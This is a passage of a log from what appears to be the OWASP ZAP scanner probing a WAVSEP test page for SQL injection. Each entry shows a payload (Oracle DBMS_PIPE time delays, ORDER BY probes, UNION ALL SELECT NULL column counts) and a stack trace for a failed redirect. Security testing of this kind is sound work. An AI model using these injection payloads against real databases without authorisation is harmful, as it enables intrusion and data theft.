org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680314 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 3801=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(100)||CHR(84)||CHR(68),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 3801=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(100)||CHR(84)||CHR(68),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680315 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 5911=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(117)||CHR(122)||CHR(65),5) AND ('LquY'='LquY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 5911=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(117)||CHR(122)||CHR(65),5) AND ('LquY'='LquY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680316 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 1242=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(98)||CHR(116)||CHR(68),5) AND 'bTdD'='bTdD] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 1242=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(98)||CHR(116)||CHR(68),5) AND 'bTdD'='bTdD at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680318 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 2426=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(104)||CHR(88)||CHR(72),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 2426=DBMS_PIPE.RECEIVE_MESSAGE(CHR(69)||CHR(104)||CHR(88)||CHR(72),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680320 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 6805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(69)||CHR(82)||CHR(88),5)-- ITFB] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 6805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(69)||CHR(82)||CHR(88),5)-- ITFB at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680321 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680322 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1106-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 1106-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680324 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680325 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680326 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680327 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680328 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680329 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680331 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT 